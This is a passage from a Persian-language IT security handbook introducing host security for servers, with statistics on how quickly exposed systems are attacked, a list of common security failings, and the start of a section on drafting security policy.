‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ ﺭﻭﻱ ﺁﻥ ﺍﺟﺮﺍ ﻣﻲﺷﻮﻧﺪ‪ .‬ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﺑﺮﺧﻲ ﺍﺯ ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ ﺑﺴﻴﺎﺭ ﺭﺍﻳﺞ ﺩﺭ ﻛﺎﺭﺑﺮﺩ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﻌﻨﻮﺍﻥ ﺳﺮﻭﻳﺲﺩﻫﻨـﺪﺓ‬
‫ﺧﺪﻣﺎﺕ ﺍﻃﻼﻋﺎﺗﻲ ﺭﺍ ﻣﻮﺭﺩ ﺑﺤﺚ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻴﻢ ﻭ ﻧﺤﻮﺓ ﺍﺳﺘﻘﺮﺍﺭ ﻭ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ ﺑﺮﺍﻱ ﺑﻪ ﺣﺪﺍﻗﻞ ﺭﺳﺎﻧﺪﻥ ﺍﻳﻦ ﻣﺸﻜﻼﺕ ﺭﺍ‬
‫ﻲ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺑﻌﻨﻮﺍﻥ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ‬ ‫ﺗﺸﺮﻳﺢ ﻣﻲﻛﻨﻴﻢ‪ .‬ﺍﻳﻦ ﻓﺼﻞ ﺍﺑﺘﺪﺍ ﺍﻣﻨﻴﺖ ﻣﻴﺰﺑﺎﻥ‪ ١٩١‬ﻭ ﺳﭙﺲ ﻧﻜﺎﺕ ﺍﻣﻨﻴﺘ ﹺ‬
‫ﭘﺴﺘﻲ‪ ،‬ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻓﺎﻳﻞ‪ ،‬ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻭﺏ‪ ،‬ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩ‪ ،‬ﻭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻧﺎﻡ ﺭﺍ ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﺪ‪.‬‬

‫ﺍﻣﻨﻴﺖ ﻣﻴﺰﺑﺎﻥ‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺍﺧﺘﺼﺎﺻﻲ ﺩﺍﺭﻧﺪ‪ ،‬ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﻣﻘﺎﺑـﻞ ﺣﻤـﻼﺕ ﺑﻴﺮﻭﻧـﻲ ﺍﻳﻤـﻦ‬
‫ﻧﻤﻲﻛﻨﻨﺪ‪ .‬ﻛﺎﺭﺑﺮﺍﻥ ﻫﻨﻮﺯ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭﻱ ﺑﻜﺎﺭ ﻣﻲﺑﺮﻧﺪ ﻛﻪ ﺑﺴﺎﺩﮔﻲ ﻗﺎﺑﻞ ﺣﺪﺱﺯﺩﻥ ﻫﺴﺘﻨﺪ‪ ،‬ﻭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺭﻣﺰﻫـﺎﻱ ﻋﺒـﻮﺭ ﻧﻴـﺰ ﺑﺮﺍﺣﺘـﻲ‬
‫ﺑﻮﺳﻴﻠﺔ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺩﻳﺪﺑﺎﻥ ﺑﺴﺘﻪﻫﺎﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ‪ ١٩٢‬ﺷﻨﺎﺳﺎﻳﻲ ﻭ ﺩﺯﺩﻳﺪﻩ ﻣﻲﺷﻮﻧﺪ‪.‬‬
‫ﺍﻣﺮﻭﺯﻩ ﻫﺰﺍﺭﺍﻥ ﮔﺮﻭﻩ ﺳﺎﺯﻣﺎﻧﻴﺎﻓﺘﻪ ﻭ ﻧﻴﻤﻪﺳﺎﺯﻣﺎﻧﻴﺎﻓﺘﻪ ﺍﺯ ﻣﻬﺎﺟﻤﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﻧـﺪ ﻛـﻪ ﺍﻃﻼﻋـﺎﺕ ﻣﺮﺑـﻮﻁ ﺑـﻪ ﺁﺳـﻴﺐﭘـﺬﻳﺮﻳﻬﺎﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﻭ‬
‫ﺭﻭﺷﻬﺎﻱ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﺍﺯ ﺁﻧﻬﺎ ﺭﺍ ﻣﺒﺎﺩﻟﻪ ﻣﻲﻛﻨﻨﺪ؛ ﻓﻨﻮﻥ ﻭ ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻮﺍﺭﺩ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﻣﻞ ﻧﻔﻮﺫ ﺑﻪ ﻻﻳﻪﻫـﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺳﻴـﺴﺘﻤﻬﺎ ﺑـﺎ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ،‬ﮔﺮﻭﻫﻬﺎﻱ ﺧﺒﺮﻱ‪ ،‬ﺻﻔﺤﺎﺕ ﻭﺏ‪ ،‬ﻭ ﮔﻔﺘﮕﻮﻱ ﻋﻤﻮﻣﻲ ﺍﻳﻨﺘﺮﻧﺖ )‪ ١٩٣(IRC‬ﺩﺭ ﺣﺪ ﻭﺳﻴﻌﻲ ﻣﻨﺘﺸﺮ ﻣﻲﺷﻮﻧﺪ‪ ،‬ﻭ‬
‫ﺍﺑﺰﺍﺭﻫﺎﻱ ﺿﺪ ﺍﻣﻨﻴﺘﻲ )ﺩﻳﺪﺑﺎﻧﻬﺎﻱ ﺭﻣﺰ ﻋﺒﻮﺭ‪ ،١٩٤‬ﻓﺎﻳﻠﻬﺎﻱ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﺍﺯ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ‪ ،‬ﻭ ﺍﺳﺒﻬﺎﻱ ﺗﺮﺍﻭﺍ( ﻧﻴﺰ ﺩﺭ ﺩﺳﺘﺮﺱ ﻋﻤﻮﻡ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ‪.‬‬
‫ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﻣﻬﺎﺟﻤﺎﻥ ﺍﺯ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺧﻮﺩﻛﺎﺭ ﺑﺮﺍﻱ ﺟﺴﺘﺠﻮ ﺑﺪﻧﺒﺎﻝ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺁﺳﻴﺐﭘﺬﻳﺮ ﺍﺳﺘﻔﺎﺩﻩ ﻭ ﺩﺭ ﺑﺮﺧﻲ ﻣﻮﺍﺭﺩ ﺑﺼﻮﺭﺕ ﺧﻮﺩﻛـﺎﺭ ﺑـﻪ‬
‫ﺐ ﻭﺍﺭﺩﻩ ﺭﺍ ﻧﻴﺰ ﭘﻨﻬﺎﻥ ﻣﻲﻧﻤﺎﻳﻨﺪ‪ .‬ﺍﺗـﺼﺎﻻﺕ ﭘﺮﺳـﺮﻋﺖ ﺍﻳﻨﺘﺮﻧﺘـﻲ‬ ‫ﺍﻳﻦ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻧﻔﻮﺫ ﻣﻲﻛﻨﻨﺪ ﻭ ﺩﺭ ﺁﻥ ﺩﺭﺑﻬﺎﻱ ﻣﺨﻔﻲ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻨﺪ‪ ،‬ﻭ ﺁﺳﻴ ﹺ‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﺭﺍ ﺑﺮﺍﻱ ﻣﻬﺎﺟﻤﺎﻥ ﺑﻮﺟﻮﺩ ﺁﻭﺭﺩﻩ ﻛﻪ ﺩﺭ ﻋﺮﺽ ﻣﺪﺕﺯﻣﺎﻥ ﻛﻮﺗﺎﻫﻲ ﺑﺘﻮﺍﻧﻨﺪ ﻣﻴﻠﻴﻮﻧﻬﺎ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﺑـﺪﻧﺒﺎﻝ ﺁﺳـﻴﺐﭘـﺬﻳﺮﻳﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ‬
‫ﭘﻮﻳﺶ ﻛﻨﻨﺪ‪.‬‬
‫ﭘﺮﻭﮊﺓ ﻛﻮﺯﺓ ﻋﺴﻞ‪ (http://project.honypot.org/) ١٩٥‬ﻳﻚ ﭘﺮﻭﮊﺓ ﺗﺤﻘﻴﻘﺎﺕ ﺁﺯﺍﺩ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺍﺳﺖ ﻛﻪ ﻣﻲﺧﻮﺍﻫﺪ ﺑـﺎ ﻗـﺮﺍﺭ ﺩﺍﺩﻥ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ‬
‫ﻼ‬
‫ﺁﺳﻴﺐﭘﺬﻳﺮ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﻭ ﺑﺮﺭﺳﻲ ﺳﺮﻋﺖ ﺍﻧﺠﺎﻡ ﺣﻤﻠﻪ ﺑﻪ ﺁﻧﻬﺎ‪ ،‬ﮔﺴﺘﺮﺩﮔﻲ ﺟﺎﻣﻌﺔ ﻧﻔﻮﺫﮔﺮﺍﻥ ﺭﺍ ﺍﻧﺪﺍﺯﻩﮔﻴﺮﻱ ﻛﻨﺪ‪ .‬ﻧﺘـﺎﻳﺞ ﺍﻳـﻦ ﭘـﺮﻭﮊﻩ ﺍﺻـ ﹰ‬
‫ﺍﻣﻴﺪﻭﺍﺭﻛﻨﻨﺪﻩ ﻧﻴﺴﺖ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺩﺭ ﮊﻭﺋﻦ ﺳﺎﻝ ‪ ۲۰۰۱‬ﺍﻋﻼﻡ ﺷﺪ ﻛﻪ ﺑﺮ ﺍﺳﺎﺱ ﻳﺎﻓﺘﻪﻫﺎﻱ ﺍﻳﻦ ﭘﺮﻭﮊﻩ‪ ،‬ﻳﻚ ﺳﻴـﺴﺘﻢ ‪ Red Hat 6.2‬ﺍﺯ‬
‫ﺯﻣﺎﻧﻴﻜﻪ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻣﺘﺼﻞ ﺷﻮﺩ‪ ،‬ﺑﻄﻮﺭ ﻣﺘﻮﺳﻂ ﭘﺲ ﺍﺯ ﺗﻨﻬﺎ ‪ ۷۲‬ﺳﺎﻋﺖ ﺗﻮﺳﻂ ﻳﻚ ﻣﻬﺎﺟﻢ ﻭ ﺑﺎ ﻳﻚ ﻧﺮﻡﺍﻓـﺰﺍﺭ ﻧﻔـﻮﺫ ﺷـﻨﺎﺧﺘﻪﺷـﺪﻩ ﻣـﻮﺭﺩ‬
‫ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺧﻮﺍﻫﺪ ﮔﺮﻓﺖ‪ .‬ﻳﻚ ﺳﻴﺴﺘﻢ ﻣﻌﻤﻮﻟﻲ ﻣﺘﺼﻞ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺩﺭ ﺭﻭﺯ ﺑﺎﺭﻫﺎ ﺗﻮﺳﻂ ﻣﻬﺎﺟﻤﺎﻥ ﭘﻮﻳﺶ ﻣﻲﺷﻮﺩ‪ .‬ﺭﺍﻳﺎﻧﻪﻫﺎﻳﻲ ﻛـﻪ‬
‫ﺍﺯ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ‪ Windows 98‬ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ﻭ ﻗﺎﺑﻠﻴﺖ ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻞ )ﻳﻜﻲ ﺍﺯ ﺗﻨﻈﻴﻤﺎﺕ ﭘﻴﺶﻓﺮﺽ ﺑﺮﺍﻱ ﻋﻤﺪﺓ ﻛـﺎﺭﺑﺮﺍﻥ ﺧـﺎﻧﮕﻲ( ﺩﺭ ﺁﻧﻬـﺎ‬

‫‪191‬‬ ‫‪Host Security‬‬


‫‪192‬‬ ‫‪Packet Sniffer Software‬‬
‫‪193‬‬ ‫‪Internet Relay Chat‬‬
‫‪194‬‬ ‫‪Password Sniffers‬‬
‫‪195‬‬ ‫‪Honey Pot‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٣٤٨‬‬

‫ﻻ ﺩﺭ ﻫﻤﺎﻥ ﺭﻭﺯ ﺍﻭﻝ ﻣﻮﺭﺩ ﻧﻔﻮﺫ ﻗﺮﺍﺭ ﻣـﻲﮔﻴﺮﻧـﺪ‪ .‬ﺩﺭ ﻳـﻚ‬


‫ﻓﻌﺎﻝ ﺍﺳﺖ ﻧﻴﺰ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺑﻄﻮﺭ ﻣﺘﻮﺳﻂ ﺳﺎﻋﺘﻲ ﻳﻜﺒﺎﺭ ﭘﻮﻳﺶ ﻣﻲﺷﻮﻧﺪ ﻭ ﻣﻌﻤﻮ ﹰ‬
‫ﻣﻮﺭﺩ‪ ،‬ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﻌﺪ ﺍﺯ ﺗﻨﻬﺎ ‪ ۱۵‬ﺩﻗﻴﻘﻪ ﺍﺗﺼﺎﻝ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻣﻮﺭﺩ ﻧﻔﻮﺫ ﻗﺮﺍﺭ ﮔﺮﻓﺖ!‬
‫ﺍﻳﻦ ﺧﻴﺎﻟﭙﺮﺩﺍﺯﻱ ﺍﺳﺖ ﻛﻪ ﺗﺼﻮﺭ ﺷﻮﺩ ﺑﺎ ﺭﻋﺎﻳﺖ ﻓﻬﺮﺳﺘﻲ ﺍﺯ "ﺑﺎﻳﺪﻫﺎ" ﻭ "ﻧﺒﺎﻳﺪﻫﺎ" ﺩﺭ ﺷﺒﻜﻪﻫﺎ ﻭ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻣﻲﺗﻮﺍﻥ ﺍﻣﻨﻴﺖ ﻣﻴﺰﺑـﺎﻥ ﺭﺍ ﺗـﺄﻣﻴﻦ‬
‫ﻛﺮﺩ‪ .‬ﻣﻤﻜﻦ ﺍﺳﺖ ﮔﻔﺘﻪ ﺷﻮﺩ ﺩﺭ ﻫﺮﺻﻮﺭﺕ‪ ،‬ﻣﻬﺎﺟﻢ ﺑﺮﺍﻱ ﺗﺨﺮﻳﺐ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﺑﺎﻳﺪ ﺑﻪ ﺁﻥ ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻛﻨﺪ ﻭ ﺑﻨﺎﺑﺮﺍﻳﻦ ﺍﺯ ﻟﺤـﺎﻅ ﻧﻈـﺮﻱ‪،‬‬
‫ﺑﺮﺍﻱ ﺍﻳﻤﻦ ﻛﺮﺩﻥ ﻳﻚ ﺳﻴﺴﺘﻢ ﺗﻤﺎﻡ ﺁﻧﭽﻪ ﻧﻴﺎﺯ ﺩﺍﺭﻳﺪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻛﻠﻴﺔ ﺭﺍﻫﻬﺎﻱ ﺩﺳﺘﺮﺳﻲ ﻣﻬﺎﺟﻢ ﺑـﻪ ﺳﻴـﺴﺘﻢ ﺭﺍ ﻣـﺴﺪﻭﺩ ﻧﻤﺎﻳﻴـﺪ‪ ،‬ﻭ ﺩﺭ‬
‫ﺍﻳﻨﺼﻮﺭﺕ ﺳﻴﺴﺘﻢ ﻣﻮﺭﺩ ﻧﻈﺮ ﺍﻳﻤﻦ ﺧﻮﺍﻫﺪ ﺑﻮﺩ‪ .‬ﺍﻣﺎ ﺩﺭ ﻋﻤﻞ ﻭ ﺑﺮ ﺍﺳﺎﺱ ﺗﺠﺮﺑﻪ ﺛﺎﺑﺖ ﺷﺪﻩ ﻛﻪ ﺗﻘﺮﻳﺒﹰﺎ ﻏﻴﺮﻣﻤﻜﻦ ﺍﺳﺖ ﻛﻪ ﺑﺘـﻮﺍﻥ ﺭﺍﻳﺎﻧـﻪﺍﻱ‬
‫ﻲ ﻣﻬﺎﺟﻤﺎﻥ‬ ‫ﺩﺍﺷﺖ ﻛﻪ ﺩﺭ ﺷﺒﻜﻪ ﺧﺪﻣﺎﺗﻲ ﺍﺭﺍﺋﻪ ﻛﻨﺪ ﻭ ﺩﺭ ﻋﻴﻦ ﺣﺎﻝ ﻛﻠﻴﺔ ﺭﺍﻫﻬﺎﻱ ﺩﺳﺘﺮﺳﻲ ﻣﻬﺎﺟﻤﺎﻥ ﺑﻪ ﺁﻥ ﻣﺴﺪﻭﺩ ﺑﺎﺷﺪ؛ ﭼﺮﺍﻛﻪ ﺩﺳﺘﺮﺳ ﹺ‬
‫ﻻ ﺍﺯ ﻃﺮﻳﻖ ﻣﻨﺎﻓﺬ ﻧﺎﺩﺍﻧﺴﺘﻪ ﻧﻈﻴﺮ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﻢﺩﻗﺖ ‪ CGI‬ﻳﺎ ﺣﻤﻼﺕ ﺳﺮﺭﻳﺰﻱ ‪ buffer‬ﻛﻪ ﺑﺮﺍﻱ ﻣﻬﺎﺟﻤﺎﻥ ﺷـﻨﺎﺧﺘﻪﺷـﺪﻩ ﻭ‬ ‫ﻣﻌﻤﻮ ﹰ‬
‫ﺑﺮﺍﻱ ﻋﻤﺪﺓ ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍﻳﺎﻧﻪ ﻧﺎﺷﻨﺎﺧﺘﻪ ﻫﺴﺘﻨﺪ ﺻﻮﺭﺕ ﻣﻲﮔﻴﺮﺩ‪.‬‬
‫ﺑﺮﺍﻱ ﺑﻴﺶ ﺍﺯ ﻳﻚ ﺩﻫﻪ‪ ۹ ،‬ﺍﻟﮕﻮﻱ ﻣﻮﺭﺩ ﺍﻗﺒﺎﻝ ﻋﻤﻮﻣﻲ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻨﺪ ﻛﻪ ﺍﻣﻨﻴﺖ ﻣﻴﺰﺑﺎﻥ ﺭﺍ ﺑﺴﻴﺎﺭ ﭘﻴﭽﻴﺪﻩﺗـﺮ ﻣـﻲﻛﺮﺩﻧـﺪ‪ .‬ﺍﻳـﻦ‬
‫ﺍﻟﮕﻮﻫﺎ ﻋﺒﺎﺭﺕ ﺑﻮﺩﻧﺪ ﺍﺯ‪:‬‬
‫ﺑﻲﺗﻮﺟﻬﻲ ﺑﻪ ﺍﻣﻨﻴﺖ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺑﻌﺪ ﺯﻳﺮﺑﻨﺎﻳﻲ ﻃﺮﺍﺣﻲ ﻭ ﺗﻨﻈﻴﻢ ﺳﻴﺴﺘﻤﻬﺎ )ﻭ ﺗﺪﻭﻳﻦ ﺳﻴﺎﺳﺘﻬﺎ(؛‬ ‫•‬
‫ﺧﺮﻳﺪﺍﺭﻱ ﻭ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺮ ﺍﺳﺎﺱ ﻣﻌﻴﺎﺭﻫﺎﻳﻲ ﭼﻮﻥ ﻫﺰﻳﻨﻪ ﻭ ﺗﻄﺒﻴﻖﭘﺬﻳﺮﻱ‪ ،‬ﻭ ﻧﻪ ﻋﻤﻠﻜﺮﺩ ﻣﻄﻠﻮﺏ ﻭ ﺍﻟﺰﺍﻣﺎﺕ ﻭ‬ ‫•‬
‫ﻧﻴﺎﺯﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ؛‬
‫ﻧﺎﺗﻮﺍﻧﻲ ﺩﺭ ﺗﻬﻴﺔ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻛﻪ ﺩﺭ ﺁﻥ ﻣﻨﺎﻓﺬ ﺍﻣﻨﻴﺘﻲ ﻭ ﺍﺷﻜﺎﻻﺕ ﺷﻨﺎﺧﺘﻪﺷﺪﻩ ﻭﺟﻮﺩ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ؛‬ ‫•‬
‫ﺍﺟﺮﺍﻱ ﺧﺪﻣﺎﺕ ﻏﻴﺮﺿﺮﻭﺭﻱ؛‬ ‫•‬
‫ﺍﻧﺘﻘﺎﻝ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺑﺼﻮﺭﺕ ﻣﺘﻦﺳﺎﺩﻩ ﻭ ﻗﺎﺑﻞ ﺍﺳﺘﻔﺎﺩﺓ ﻣﺠﺪﺩ ﺭﻭﻱ ﺷﺒﻜﻪ؛‬ ‫•‬
‫ﺩﻧﺒﺎﻝ ﻧﻜﺮﺩﻥ ﭘﻴﺸﺮﻓﺘﻬﺎ ﻭ ﺗﻮﺳﻌﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻭ ﻧﺎﺗﻮﺍﻧﻲ ﺩﺭ ﺍﻧﺠﺎﻡ ﺍﻗﺪﺍﻣﺎﺕ ﭘﻴﺸﮕﻴﺮﺍﻧﻪ؛‬ ‫•‬
‫ﻼ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﺪﻧﺪ؛‬‫ﻋﺪﻡ ﺍﺳﺘﻔﺎﺩﺓ ﺻﺤﻴﺢ ﺍﺯ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ‪ ،‬ﺍﻟﺒﺘﻪ ﺍﮔﺮ ﺍﺻ ﹰ‬ ‫•‬
‫ﻧﺒﻮﺩ ﻣﻤﻴﺰﻱ ﻭ ﺛﺒﺖ ﻭﻗﺎﻳﻊ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﻛﺎﻓﻲ؛ ﻭ‬ ‫•‬
‫ﻓﻘﺪﺍﻥ ﺭﻭﺍﻟﻬﺎﻱ ﺻﺤﻴﺢ ﺗﻬﻴﺔ ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ‪.‬‬ ‫•‬

‫ﺗﺪﻭﻳﻦ ﺳﻴﺎﺳﺖ‬
‫ﺧﻄﻮﻁ ﻗﺮﻣﺰ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﺣﻘﻴﻘﺖ ﺑﺎ ﺗﺪﻭﻳﻦ ﺳﻴﺎﺳﺖ ﺗﻌﺮﻳﻒ ﻣﻲﺷﻮﻧﺪ‪ .‬ﺩﺭ ﺑﺮﺧﻲ ﺳﺎﺯﻣﺎﻧﻬﺎ‪ ،‬ﻫﺮ ﻳﻚ ﺍﺯ ﻛﺎﺭﺑﺮﺍﻥ ﻣﺠﺎﺯ ﺍﺳﺖ ﻛﻪ ﺭﻭﻱ ﻣﺎﺷﻴﻨﻬﺎ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭ ﺟﺪﻳﺪ ﻧﺼﺐ ﻛﻨﺪ ﻭ ﻳﺎ ﺻﻔﺤﺎﺕ ﻭﺏ ﺳﺎﺯﻣﺎﻥ ﺭﺍ ﺗﻐﻴﻴﺮ ﺩﻫﺪ‪ .‬ﺩﺭ ﺑﺮﺧﻲ ﺩﻳﮕﺮ‪ ،‬ﻛﺎﺭﺑﺮﺍﻥ ﺣﺘـﻲ ﺑـﺮﺍﻱ ﺭﺅﻳـﺖ ﺻـﻔﺤﺎﺕ ﻭﺏ ﻧﻴـﺰ ﺑـﻪ‬
‫ﺩﺳﺘﺮﺳﻴﻬﺎ ﻭ ﻣﺠﻮﺯﻫﺎﻱ ﺧﺎﺹ ﻧﻴﺎﺯ ﺩﺍﺭﻧﺪ‪ .‬ﺩﺭ ﺑﻌﻀﻲ ﺳﺎﺯﻣﺎﻧﻬﺎ ﻫﺮ ﻛﺎﺭﺑﺮ ﻣﻲﺗﻮﺍﻧﺪ ﺳﻴﺴﺘﻢ ﺭﺍ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻣﺠﺪﺩ ﻳﺎ ﺧﺎﻣﻮﺵ ﻛﻨـﺪ؛ ﺩﺭﺣﺎﻟﻴﻜـﻪ‬
‫ﺩﺭ ﺑﺮﺧﻲ ﺩﻳﮕﺮ‪ ،‬ﻛﺎﺭﻫﺎﻱ ﺑﺴﻴﺎﺭ ﻛﻮﭼﻜﺘﺮ ﻣﺜﻞ ﺟﺎﻳﮕﺰﻳﻨﻲ ﻳﻚ ﻓﺎﻳﻞ ﻫﻢ ﺑﻪ ﻣﺠﻮﺯ ﺍﻣﻀﺎﺷﺪﺓ ﻣﺪﻳﺮ ﺍﺭﺷﺪ ﺍﻃﻼﻋﺎﺕ ﻧﻴﺎﺯ ﺩﺍﺭﺩ‪.‬‬
‫ﺳﻴﺎﺳﺖ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﻛﺎﺭﺑﺮﺍﻥ ﺑﺪﺍﻧﻨﺪ ﻛﻪ ﺍﻧﺠﺎﻡ ﭼﻪ ﻛﺎﺭﻱ ﻣﺠﺎﺯ ﻭ ﺍﻧﺠﺎﻡ ﭼﻪ ﻛﺎﺭﻱ ﻏﻴﺮﻣﺠﺎﺯ ﺍﺳﺖ‪ .‬ﺳﻴﺎﺳـﺖ‪ ،‬ﻣـﺪﻳﺮﺍﻥ ﻭ ﺭﺍﻫﺒـﺮﺍﻥ ﺭﺍ ﺩﺭ‬
‫ﺗﺼﻤﻴﻤﮕﻴﺮﻱ ﺩﺭ ﻣﻮﺭﺩ ﺳﻴﺴﺘﻢ ﻭ ﻧﺤﻮﺓ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﺭﺍﻫﻨﻤﺎﻳﻲ ﻣﻲﻛﻨﺪ‪ .‬ﺳﻴﺎﺳﺖ ﺑﻪ ﻃﺮﺍﺣﺎﻥ ﻛﻤﻚ ﻣﻲﻛﻨﺪ ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﺑﺴﺎﺯﻧﺪ ﻛـﻪ ﺑـﺎ‬
‫ﻛﻤﻚ ﺁﻧﻬﺎ ﺑﺘﻮﺍﻥ ﺑﻪ ﺍﻫﺪﺍﻑ ﺳﺎﺯﻣﺎﻥ ﺩﺳﺖ ﻳﺎﻓﺖ‪ .‬ﺍﺻﻠﻲﺗﺮﻳﻦ ﺟﺰﺀ ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺖ‪ ،‬ﺍﻋﻼﻡ ﺻﺮﻳﺢ ﻋﻤﻠﻜﺮﺩﻫﺎﻱ ﻣﺠـﺎﺯ ﻭ ﻏﻴﺮﻣﺠـﺎﺯ ﺑـﺮﺍﻱ‬
‫ﺍﻓﺮﺍﺩ ﻣﺨﺘﻠﻒ ﺍﺳﺖ‪ .‬ﺩﺭ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺧﻂﻣﺸﻲﻫﺎ ﺑﺎﻳﺪ ﺑﺘﻮﺍﻥ ﭘﺎﺳﺦ ﺳﺆﺍﻻﺕ ﺯﻳﺮ ﺭﺍ ﭘﻴﺪﺍ ﻛﺮﺩ‪:‬‬
‫ﭼﻪ ﻛﺴﻲ ﻣﺠﺎﺯ ﺑﻪ ﺩﺳﺘﺮﺳﻲ ﺍﺳﺖ؟ ﻣﺎﻫﻴﺖ ﺁﻥ ﺩﺳﺘﺮﺳﻲ ﭼﻴﺴﺖ؟ ﻭ ﭼﻪ ﻛﺴﻲ ﻣﺠﻮﺯ ﺍﻳﻦ ﺩﺳﺘﺮﺳﻲ ﺭﺍ ﺻﺎﺩﺭ ﻛﺮﺩﻩ ﺍﺳﺖ؟‬ ‫•‬
‫ﭼﻪ ﻛﺴﻲ ﻣﺴﺌﻮﻟﻴﺖ ﺍﻣﻨﻴﺖ‪ ،‬ﺍﺭﺗﻘﺎﻫﺎ‪ ،‬ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ‪ ،‬ﻭ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺭﺍ ﺑﺮ ﻋﻬﺪﻩ ﺩﺍﺭﺩ؟‬ ‫•‬
‫ﭼﻪ ﻧﻮﻉ ﺍﻃﻼﻋﺎﺗﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﻋﻤﻮﻡ ﺍﺭﺍﺋﻪ ﺷﻮﺩ؟‬ ‫•‬
